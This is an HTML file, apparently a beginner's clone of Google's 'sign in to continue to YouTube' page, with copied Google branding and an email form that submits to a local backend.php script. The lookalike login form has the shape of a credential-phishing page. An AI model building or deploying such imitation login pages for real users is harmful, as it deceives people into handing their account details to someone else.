<!DOCTYPE html>
<html lang="en">

<head>

    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        #uniquemain{
            border: 2px solid #e0e0e0;
            border-radius: 5px;

            width: 315px;

            margin: 0px 0px 0px 450px;
        }


        #google {
            padding: 0px 0px 0px 120px;
            font-size: larger;
            font-weight: bolder;
        }

        #signin {
            padding: 0px 0px 0px 115px;

        }

        #continue {

            padding: 0px 0px 0px 80px;
        }

        #email {
            padding: 0px 0px 0px 70px;
        }

        #detail {
            padding: 0px 0px 0px 50px;
        }

        #account {
            padding: 0px 0px 0px 50px;

        }

        #next {

            background-color: rgb(66, 133, 244);
            border: 2px solid rgb(66, 133, 244);
            margin: 0PX 0PX 0PX 70PX;
            width: auto;
            color: white
        }

        #new {
            color: white;
        }
        #select{
            border: 2px white solid;
            background-color: white;
            margin-left: 450px;
            
        }
    </style>
    <title></title>
</head>

<body>

    <div id="uniquemain">
        <div>
            <span id="google">
                <span style="color: rgb(66, 133, 244)">G</span><span style="color: red;">o</span><span
                    style="color: rgb(184, 184, 12)">o</span><span
                    style="color:  rgb(66, 133, 244);">g</span><span>l</span><span style="color: red">e</span>
            </span>
            <p id="signin"><strong>SIGN IN</strong></p>
            <p id="continue">to continue to YouTube</p>
        </div>
        <form action="backend.php">
            <div id="email" class="main">
                <label for="email1">Email: </label>
                <br>
                <input type="email" name="email" id="email1">
                <p style="color: rgb(66, 133, 244)">Forgot email?</p>

                <br>

            </div>
        </form>
    
    <div id="detail">Not your computer? Use a private browsing window to sign in.</div>
    <link rel="stylesheet" href="">
    <br>
    <span id="account" style="color: rgb(66, 133, 244)">Create Account</span><button id="next">NEXT</button>
    


    <br>
    <br>
    <br>
    <br>
</div>
<div>
<div id="select">
    <select name="language" > 
        
        <option value="ENG">ENG</option>
        <option value="URDU">URDU</option>
        <option value="MATH">MATH</option>
       

    </select><span style="margin-left: auto;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <span style="color: rgb(66, 133, 244) ;">Help Privacy Terms</span></span>



</body>



</html>